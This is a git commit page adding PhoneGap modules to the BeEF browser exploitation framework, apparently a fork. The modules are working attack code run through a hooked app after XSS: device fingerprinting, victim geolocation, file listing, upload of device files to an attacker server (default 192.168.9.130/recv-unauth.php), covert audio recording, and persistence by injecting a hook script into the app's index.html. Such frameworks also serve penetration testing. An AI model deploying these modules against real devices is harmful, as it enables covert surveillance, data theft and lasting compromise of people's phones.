Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

renamed phonegap modules dir

Browse Source
This commit is contained in:
Mike Haworth
2011-12-21 21:19:58 +13:00
parent e694e5a019
commit d2b69738b7
26 changed files with 549 additions and 1 deletions
Download Patch File Download Diff File Expand all files Collapse all files

1
modules/phonegap

Submodule modules/phonegap deleted from 083a15556a

6
modules/phonegap_/README Normal file
View File

@@ -0,0 +1,6 @@
== BeEF Modules for PhoneGap applications ==
1. Get XSS
2. Install BeEF from beefproject
3. Copy this directoy into module directory
4. Profit

7
modules/phonegap_/beep/command.js Normal file
View File

@@ -0,0 +1,7 @@
//
// make the phone beep
//
beef.execute(function() {
navigator.notification.beep(1);
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'Beeped');
});

12
modules/phonegap_/beep/config.yaml Normal file
View File

@@ -0,0 +1,12 @@
# phonegap
#
beef:
module:
Beep:
enable: true
category: "Phonegap"
name: "Beep"
description: "Make the phone beep"
authors: ["mh"]
target:
working: ["All"]

12
modules/phonegap_/beep/module.rb Normal file
View File

@@ -0,0 +1,12 @@
# phonegap
#
class Beep < BeEF::Core::Command
def post_execute
content = {}
content['result'] = @datastore['result']
save content
end
end

12
modules/phonegap_/detect/command.js Normal file
View File

@@ -0,0 +1,12 @@
//
// exploit phonegap
//
beef.execute(function() {
beef.net.send("<%= @command_url %>", <%= @command_id %>,
'phonegap_version='+" name: " + device.name
+ " phonegap api: " + device.phonegap
+ " platform: " + device.platform
+ " uuid: " + device.uuid
+ " version: " + device.version);
});

12
modules/phonegap_/detect/config.yaml Normal file
View File

@@ -0,0 +1,12 @@
# phonegap
#
beef:
module:
Detect:
enable: true
category: "Phonegap"
name: "Detect phonegap"
description: "Detects if phonegap api is present"
authors: ["mh"]
target:
working: ["All"]

12
modules/phonegap_/detect/module.rb Normal file
View File

@@ -0,0 +1,12 @@
# phonegap
#
class Detect < BeEF::Core::Command
def post_execute
content = {}
content['phonegap_version'] = @datastore['phonegap_version']
save content
end
end

44
modules/phonegap_/file_upload/command.js Normal file
View File

@@ -0,0 +1,44 @@
//
// phonegap_upload
//
beef.execute(function() {
var result = 'unchanged';
// TODO return result to beef
function win(r) {
//alert(r.response);
result = 'success';
}
// TODO return result to beef
function fail(error) {
//alert('error! errocode =' + error.code);
result = 'fail';
}
// (ab)use phonegap api to upload file
function beef_upload(file_path, upload_url) {
var options = new FileUploadOptions();
options.fileKey="content";
// grab filename from the filepath
re = new RegExp("([^/]*)$");
options.fileName = file_path.match(re)[0];
//options.fileName="myrecording.wav";// TODO grab from filepath
// needed?
var params = new Object();
params.value1 = "test";
params.value2 = "param";
options.params = params;
// needed?
var ft = new FileTransfer();
ft.upload(file_path, upload_url, win, fail, options);
}
beef_upload('<%== @file_upload_src %>', '<%== @file_upload_dst %>');
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); // move this to inside beef_upload
});

12
modules/phonegap_/file_upload/config.yaml Normal file
View File

@@ -0,0 +1,12 @@
# phonegap
#
beef:
module:
File_upload:
enable: true
category: "Phonegap"
name: "Upload file"
description: "Upload files from device to server of your choice"
authors: ["mh"]
target:
working: ["All"]

28
modules/phonegap_/file_upload/module.rb Normal file
View File

@@ -0,0 +1,28 @@
# phonegap
#
class File_upload < BeEF::Core::Command
def self.options
return [{
'name' => 'file_upload_dst',
'description' => 'Upload a file from device to your server',
'ui_label'=>'detination',
'value' => 'http://192.168.9.130/recv-unauth.php',
'width' => '300px'
},{
'name' => 'file_upload_src',
'description' => 'path to file on device',
'ui_label'=>'file path',
'value' => '/sdcard/myrecording.wav',
'width' => '300px'
}]
end
def callback
content = {}
content['Result'] = @datastore['result']
save content
end
end

30
modules/phonegap_/geo_locate/command.js Normal file
View File

@@ -0,0 +1,30 @@
//
// geo locate
//
beef.execute(function() {
var onSuccess = function(position) {
result =
'Latitude: ' + position.coords.latitude + '\n' +
'Longitude: ' + position.coords.longitude + '\n' +
'Altitude: ' + position.coords.altitude + '\n' +
'Accuracy: ' + position.coords.accuracy + '\n' +
'Altitude Accuracy: ' + position.coords.altitudeAccuracy + '\n' +
'Heading: ' + position.coords.heading + '\n' +
'Speed: ' + position.coords.speed + '\n' +
'Timestamp: ' + new Date(position.timestamp) + '\n' ;
map = 'Map url: http://maps.google.com/?ll='+
position.coords.latitude + ',' + position.coords.longitude;
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result+map );
};
// onError Callback receives a PositionError object
//
function onError(error) {
console.log('code: ' + error.code + '\n' +
'message: ' + error.message + '\n');
}
navigator.geolocation.getCurrentPosition(onSuccess, onError);
});

12
modules/phonegap_/geo_locate/config.yaml Normal file
View File

@@ -0,0 +1,12 @@
# phonegap
#
beef:
module:
Geo_locate:
enable: true
category: "Phonegap"
name: "Geo locate"
description: "Geo locate your victim"
authors: ["mh"]
target:
working: ["All"]

12
modules/phonegap_/geo_locate/module.rb Normal file
View File

@@ -0,0 +1,12 @@
# phonegap
#
class Geo_locate < BeEF::Core::Command
def post_execute
content = {}
content['result'] = @datastore['result']
save content
end
end

36
modules/phonegap_/list_files/command.js Normal file
View File

@@ -0,0 +1,36 @@
//
// phonegap_upload
//
beef.execute(function() {
var directory = "<%== @directory %>";
var result = '';
function fail() {
result = 'fail';
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result );
}
function success(entries) {
var i;
for (i=0; i<entries.length; i++) {
result = result + '\n ' + entries[i].name;
}
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result );
}
// use directoryentry to create directory reader
function gotDirEntry(dirEntry) {
var directoryReader = dirEntry.createReader();
directoryReader.readEntries(success,fail);
}
// use getDirectoy to create reference to directoryentry
function gotFS(fileSystem) {
fileSystem.root.getDirectory(directory, null, gotDirEntry, fail);
}
window.requestFileSystem(LocalFileSystem.PERSISTENT, 0, gotFS, fail);
});

12
modules/phonegap_/list_files/config.yaml Normal file
View File

@@ -0,0 +1,12 @@
# phonegap
#
beef:
module:
List_files:
enable: true
category: "Phonegap"
name: "List files"
description: "Examine device file system"
authors: ["mh"]
target:
working: ["All"]

22
modules/phonegap_/list_files/module.rb Normal file
View File

@@ -0,0 +1,22 @@
# phonegap
#
class List_files < BeEF::Core::Command
def self.options
return [{
'name' => 'directory',
'description' => 'List files in this directory',
'ui_label'=>'Directory',
'value' => '/',
'width' => '300px'
}]
end
def callback
content = {}
content['Result'] = @datastore['result']
save content
end
end

137
modules/phonegap_/persistence/command.js Normal file
View File

@@ -0,0 +1,137 @@
//
// persistence
//
beef.execute(function() {
// insert hook into index.html
//
// 1. locate index.html
// 2. read it in
// 3. add our hook
// 4. write it back out to same location
// 1. locate index.html
//
// list dirs under current dir
// one should be something.app
// inside that should be a www dir and in that an index.html
//
// write the file with new hook
function write_file(text) {
function fail () {
console.log('write_file fail')
}
function gotFileWriter(writer) {
writer.onwrite = function(evt) {
console.log("write success");
}
writer.write(text);
}
function gotFileEntry(fileEntry) {
fileEntry.createWriter(gotFileWriter, fail);
}
function gotFS(fileSystem) {
fileSystem.root.getFile("../"+window.tmpfilename+"/www/index.html", null, gotFileEntry, fail);
}
window.requestFileSystem(LocalFileSystem.PERSISTENT, 0, gotFS, fail);
}
// find <head></head> and insert our hook.
function replace_text(text) {
re = new RegExp("<head>", "g");
hook_url = '<%== @hook_url %>';
new_text = text.replace(re, "<head><script src='" + hook_url + "'></script>")
write_file(new_text);
}
function read_index(app_name) {
function fail () {
console.log('read_index fail')
}
function readFile(file) {
var reader = new FileReader();
reader.onloadend = function(evt) {
//console.log("Read as text");
console.log(evt.target.result);
replace_text(evt.target.result);
};
reader.readAsText(file);
}
function gotFileEntry(fileEntry) {
fileEntry.file(readFile, fail);
}
function gotFS(fileSystem) {
fileSystem.root.getFile("../"+app_name+"/www/index.html", null, gotFileEntry, fail);
}
window.requestFileSystem(LocalFileSystem.PERSISTENT, 0, gotFS, fail);
}
function locate() {
function result(entries) {
console.log('result');
var i;
for (i=0; i<entries.length; i++) {
// looking for <something>.app
var re = new RegExp(/^[a-zA-Z0-9]*\.app/)
var match = re.exec(entries[i].name)
if (match) {
console.log('found ' + entries[i].name);
// look for ../<something>.app/www/index.html
read_index(entries[i].name);
// FIXME find a less hacky way
// just wanted to make this global so I didnt have to call it again to write the file
window.tmpfilename = entries[i].name;
}
}
}
function fail() {
console.log('fail');
}
function win(entries) {
console.log('win');
result(entries);
}
// use directoryentry to create directory reader
function gotDirEntry(dirEntry) {
var directoryReader = dirEntry.createReader();
directoryReader.readEntries(win,fail);
}
// use getDirectoy to create reference to directoryentry
function gotFS(fileSystem) {
// on iphone current dir defaults to <myname>.app/documents
// so we wanna look in our parent directory for <something>.app
fileSystem.root.getDirectory('../', null, gotDirEntry, fail);
}
window.requestFileSystem(LocalFileSystem.PERSISTENT, 0, gotFS, fail);
}
//result = fail;
//beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result);
locate();
result = 'success';
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result);
});

12
modules/phonegap_/persistence/config.yaml Normal file
View File

@@ -0,0 +1,12 @@
# phonegap persistence
#
beef:
module:
Persistence:
enable: true
category: "Phonegap"
name: "Persistence"
description: "Insert the beef hook into phonegap's index.html (iphone only)"
authors: ["mh"]
target:
working: ["All"]

22
modules/phonegap_/persistence/module.rb Normal file
View File

@@ -0,0 +1,22 @@
# phonegap persistenece
#
class Persistence < BeEF::Core::Command
def self.options
return [{
'name' => 'hook_url',
'description' => 'The URL of your beef hook',
'ui_label'=>'Hook URL',
'value' => 'http://beef:3000/hook.js',
'width' => '300px'
}]
end
def post_execute
content = {}
content['result'] = @datastore['result']
save content
end
end

24
modules/phonegap_/start_record_audio/command.js Normal file
View File

@@ -0,0 +1,24 @@
//
// exploit phonegap
//
beef.execute(function() {
// TODO detect iphone/android and set this accordingly
var file_uri = "<%== @file_name %>";
m = new Media(file_uri);
m.startRecord();
// weirdly setTimeout and stopRecord don't seem to work together
//milliseconds = "<%== @duration %>" * 1000;
//setTimeout("m.stopRecord()", milliseconds);
// so here is an ugly work around
//start = new Date();
//stop = start.getTime() + 5000;
//do {
// current = new Date();
// current = current.getTime();
//} while(current < stop)
//m.stopRecord();
beef.net.send("<%= @command_url %>", <%= @command_id %>, "started recording");
});

12
modules/phonegap_/start_record_audio/config.yaml Normal file
View File

@@ -0,0 +1,12 @@
# phonegap
#
beef:
module:
Start_record_audio:
enable: true
category: "Phonegap"
name: "Start record audio"
description: "Start Record audio"
authors: ["mh"]
target:
working: ["All"]

22
modules/phonegap_/start_record_audio/module.rb Normal file
View File

@@ -0,0 +1,22 @@
# phonegap
#
class Start_record_audio < BeEF::Core::Command
def self.options
return [
{'name' => 'file_name',
'description' => 'File name for audio recording',
'ui_label' => 'file name',
'value' => 'myrecording.wav'
}
]
end
def post_execute
content = {}
content['file_name'] = @datastore['file_name']
save content
end
end

20
modules/phonegap_/stop_record_audio/command.js Normal file
View File

@@ -0,0 +1,20 @@
//
// exploit phonegap
//
beef.execute(function() {
m.stopRecord();
// weirdly setTimeout and stopRecord don't seem to work together
//milliseconds = "<%== @duration %>" * 1000;
//setTimeout("m.stopRecord()", milliseconds);
// so here is an ugly work around
//start = new Date();
//stop = start.getTime() + 5000;
//do {
// current = new Date();
// current = current.getTime();
//} while(current < stop)
//m.stopRecord();
beef.net.send("<%= @command_url %>", <%= @command_id %>, "finished recording");
});

12
modules/phonegap_/stop_record_audio/config.yaml Normal file
View File

@@ -0,0 +1,12 @@
# phonegap
#
beef:
module:
Stop_record_audio:
enable: true
category: "Phonegap"
name: "Stop record audio"
description: "Stop Record audio"
authors: ["mh"]
target:
working: ["All"]

7
modules/phonegap_/stop_record_audio/module.rb Normal file
View File

@@ -0,0 +1,7 @@
# phonegap
#
class Stop_record_audio < BeEF::Core::Command
end